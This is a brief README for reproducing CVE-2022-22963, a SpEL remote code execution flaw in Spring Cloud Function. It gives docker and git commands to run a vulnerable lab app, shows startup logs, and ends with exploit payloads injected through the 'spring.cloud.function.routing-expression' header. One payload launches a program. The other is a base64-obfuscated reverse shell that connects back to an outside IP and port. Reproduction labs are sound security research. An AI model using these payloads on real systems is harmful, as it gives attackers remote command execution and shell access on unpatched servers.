
CVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_exploit

CVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_漏洞复现



git clone https://github.com/RanDengShiFu/CVE-2022-22963.git;cd CVE-2022-22963;bash Start.sh


rm -rf CVE-2022-22963/;mkdir CVE-2022-22963/;cd CVE-2022-22963/;git clone https://github.com/N1ce759/Spring-Cloud-Function-SPEL-RCE;cd ..;pwd;docker run -p 9000:9000 --name=CVE-2022-22963 --restart=always -v $PWD/CVE-2022-22963/Spring-Cloud-Function-SPEL-RCE:/root/ tomcat:10.1-jdk17-temurin java -jar /root/SpringCloud-Function-0.0.1-SNAPSHOT.jar;


[root@localhost Spring_cloud_function_RCE]# bash Start_.sh 
2022-03-30 11:40:05.274  INFO 1 --- [           main] c.e.S.F.SpringCloudFunctionApplication   : Starting SpringCloudFunctionApplication v0.0.1-SNAPSHOT using Java 17.0.2 on 6725bdc775ef with PID 1 (/root/SpringCloud-Function-0.0.1-SNAPSHOT.jar started by root in /usr/local/tomcat)
2022-03-30 11:40:05.279  INFO 1 --- [           main] c.e.S.F.SpringCloudFunctionApplication   : No active profile set, falling back to 1 default profile: "default"
2022-03-30 11:40:06.624  INFO 1 --- [           main] o.s.b.w.embedded.tomcat.TomcatWebServer  : Tomcat initialized with port(s): 9000 (http)
2022-03-30 11:40:06.626  INFO 1 --- [           main] o.a.catalina.core.AprLifecycleListener   : Loaded Apache Tomcat


{'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("clac")', 'Content-Type': 'application/x-www-form-urlencoded'}


{'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjAuMC4xLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}")', 'Co ntent-Type': 'application/x-www-form-urlencoded'}